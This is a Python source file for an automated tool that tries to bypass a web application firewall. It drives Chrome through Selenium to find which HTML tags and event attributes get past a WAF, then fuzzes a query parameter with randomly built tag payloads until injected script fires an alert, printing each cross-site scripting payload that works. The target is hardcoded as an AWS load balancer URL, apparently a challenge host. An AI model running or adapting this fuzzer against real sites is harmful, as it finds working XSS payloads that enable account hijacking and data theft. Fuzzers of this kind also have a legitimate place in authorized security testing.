xzzuf/wafer.py

349 lines
11 KiB
Python
Raw Permalink Normal View History

2023-11-27 14:20:19 +00:00
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.chrome import service
from urllib.parse import urlparse
from urllib.parse import urlencode
from language import HTMLTag, HTMLAttribute, HTMLTagAttributeType
from tags import GlobalAttributes, EventsAttributes, TagSpecificAttributes, Tags
from mutations import Mutations
from utils import choice, choice_percent
from threading import Thread, Lock
import random
import time
# WAFBypass class
class TagList():
def __init__(self, e):
self.l = list(e)
def __str__(self) -> str:
s = ""
for tag in self.l:
s += f"{tag}"
return s
class FuzzQueue():
def __init__(self) -> None:
self.queue = []
self.lock = Lock()
def push(self, tag):
self.lock.acquire()
self.queue.append(tag)
self.lock.release()
def pop(self):
if len(self.queue) == 0:
return None
self.lock.acquire()
element = self.queue.pop()
self.lock.release()
return element
def __len__(self):
return len(self.queue)
class WAFBypass():
code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;};window.confirm = window.alert;window.prompt = window.alert;"
trigger = """
var ids = {0};
for (var i = 0; i < ids.length; i++) {{
var element = document.getElementById(ids[i]);
if(!element) continue;
// trigger all possible events click, mouseover, etc.
var events = ['click', 'mouseover', 'mousedown', 'mouseup', 'mousemove', 'mouseout', 'mouseenter', 'mouseleave', 'dblclick', 'contextmenu', 'wheel', 'select', 'pointerdown', 'pointerup', 'pointermove', 'pointerover', 'pointerout', 'pointerenter', 'pointerleave', 'gotpointercapture', 'lostpointercapture'];
try {{
for (var j = 0; j < events.length; j++) {{
var event = new MouseEvent(events[j], {{bubbles: true}});
element.dispatchEvent(event);
}}
element.focus();
element.blur();
// trigger accesskey ctrl+alt+X
element.dispatchEvent(new KeyboardEvent('keydown', {{ctrlKey: true, altKey: true, key: 'x'}}));
}} catch (e) {{}}
}}
"""
def __init__(self, url, param) -> None:
self.param = param
self.options = webdriver.ChromeOptions()
self.options.add_argument('--no-sandbox')
# self.options.add_argument('--headless')
self.options.add_argument('--disable-gpu')
self.options.add_experimental_option(
"excludeSwitches", ["enable-logging"])
self.unfiltered_attributes = {}
self.unfiltered_tags = []
self.driver = webdriver.Chrome(
options=self.options,
service=service.Service(service_args=["--log-path=NUL"]))
self.url = urlparse(url)
self.mutator = Mutations()
self.queue = FuzzQueue()
self.threads = []
self.lock = Lock()
self.payloads = 0
random.seed(time.time_ns())
if not self.check_connection():
raise Exception("Connection Error")
self.driver.execute_cdp_cmd(
"Page.addScriptToEvaluateOnNewDocument", {"source": self.code})
def inc_payloads(self):
self.lock.acquire()
self.payloads += 1
self.lock.release()
def check_connection(self):
try:
self.driver.get(self.url.geturl())
return True
except:
return False
def wait_for_pageload(self, driver):
try:
WebDriverWait(driver, 4).until(
lambda driver: driver.execute_script("return document.readyState") == "complete")
except TimeoutError:
raise Exception("Page Load Error")
def get_page_title(self):
return self.driver.title
@property
def is_403(self):
return self.driver.title == "403 Forbidden"
@property
def triggered_xss(self):
return self.driver.execute_script("return window.alert_trigger")
def navigate(self, driver, url):
driver.get(url)
self.wait_for_pageload(driver)
is403 = False
if self.is_403:
is403 = True
else:
is403 = False
triggerxss = self.triggered_xss
return (is403, triggerxss)
def identify_unfiltered_attributes(self):
try:
self.unfiltered_attributes["global"] = []
self.unfiltered_attributes["events"] = []
self.unfiltered_attributes["tag_specific"] = {}
for attr in GlobalAttributes:
encoded = urlencode({self.param: f"{attr}"})
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
is403, _ = self.navigate(self.driver, url)
if not is403:
self.unfiltered_attributes["global"].append(attr)
for attr in EventsAttributes:
encoded = urlencode({self.param: f"{attr}"})
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
is403, _ = self.navigate(self.driver, url)
if not is403:
self.unfiltered_attributes["events"].append(attr)
for tag in self.unfiltered_tags:
if tag not in self.unfiltered_attributes["tag_specific"]:
self.unfiltered_attributes["tag_specific"][tag.name] = []
try:
for attr in TagSpecificAttributes[tag.name]:
encoded = urlencode(
{self.param: f"<{tag.name} {attr}/>"})
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
is403, _ = self.navigate(self.driver, url)
if not is403:
self.unfiltered_attributes["tag_specific"][tag.name].append(
attr)
except KeyError:
print(f"Tag {tag.name} not found in TagSpecificAttributes")
except KeyboardInterrupt:
return
def identify_unfiltered_tags(self):
try:
for tag in Tags:
encoded = urlencode({self.param: f"{tag}"})
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
is403, _ = self.navigate(self.driver, url)
if not is403:
self.unfiltered_tags.append(tag)
except KeyboardInterrupt:
return
def dry_run(self):
try:
self.identify_unfiltered_tags()
self.identify_unfiltered_attributes()
except Exception as e:
raise Exception(f"Dry Run Error: {e}")
except KeyboardInterrupt:
return
def get_tag(self):
try:
tag = choice(self.unfiltered_tags)
# make a copy of tag to avoid mutating the original
tag = HTMLTag(tag.name, tag.self_closing)
tag.set_mutator(self.mutator)
nglobattr = choice(range(1, 3))
nattr = choice(range(1, 3))
globals = list(self.unfiltered_attributes["global"])
for _ in range(0, nglobattr):
if len(globals) == 0:
break
attr = choice(globals)
globals.remove(attr)
# make a copy of attr to avoid mutating the original
attr = HTMLAttribute(attr.name, attr.kind,
glob=True, root=None)
tag.add_attribute(attr)
attr = choice(self.unfiltered_attributes["events"])
# make a copy of attr to avoid mutating the original
attr = HTMLAttribute(attr.name, attr.kind,
glob=False, root=None)
tag.add_attribute(attr)
tag_specific = list(
self.unfiltered_attributes["tag_specific"][tag.name])
for _ in range(0, nattr):
if len(tag_specific) == 0:
break
attr = choice(tag_specific)
tag_specific.remove(attr)
# make a copy of attr to avoid mutating the original
attr = HTMLAttribute(attr.name, attr.kind,
glob=False, root=None)
tag.add_attribute(attr)
addchildren = {
70: lambda: False,
30: lambda: True
}
should_add = choice_percent(addchildren)
if (should_add()):
tag.children.append(self.get_tag())
return tag
except KeyboardInterrupt:
return None
def fuzz_thread(self, driver: webdriver.Chrome, started):
driver.execute_cdp_cmd(
"Page.addScriptToEvaluateOnNewDocument", {"source": self.code})
while not started:
time.sleep(0.1)
pass
while True:
element = self.queue.pop()
if not element:
break
encoded = urlencode({self.param: f"{element}"})
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
is403, triggered = self.navigate(driver, url)
# close window
driver.close()
def get_tag_id(self, tag):
tag_ids = []
tag_ids.append(tag.id)
if len(tag.children) >= 0:
for child in tag.children:
tag_ids.extend(self.get_tag_id(child))
return tag_ids
def get_tag_name(self, tag):
tag_names = []
tag_names.append(tag.nameattr)
if len(tag.children) >= 0:
for child in tag.children:
tag_names.extend(self.get_tag_name(child))
return tag_names
def get_ids(self, tags):
tag_ids = []
for tag in tags:
tag_ids.extend(self.get_tag_id(tag))
return tag_ids
def get_names(self, tags):
tag_names = []
for tag in tags:
tag_names.extend(self.get_tag_name(tag))
return tag_names
def populate_ids_names(self, tags):
ids = self.get_ids(tags)
names = self.get_names(tags)
def populate(tag, ids=ids, names=names):
tag.ids = ids
tag.names = names
for child in tag.children:
populate(child)
for tag in tags:
populate(tag)
def test(self):
try:
self.dry_run()
print("Starting fuzzer")
while True:
tags = [self.get_tag() for _ in range(0, choice(range(1, 3)))]
self.populate_ids_names(tags)
payload = TagList(tags)
encoded = urlencode({self.param: f"{payload}"})
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
is403, triggered = self.navigate(self.driver, url)
if triggered:
print(f"XSS Payload: {payload}")
self.driver.execute_script(
self.trigger.format(self.get_ids(tags)))
triggered = self.triggered_xss
if triggered:
print(f"XSS Payload: {payload}")
except KeyboardInterrupt:
print("Stopping fuzzer")
self.driver.close()
return
w = WAFBypass(
"http://aws-wafbypass-lb-311079289.eu-south-1.elb.amazonaws.com", "param2")
w.test()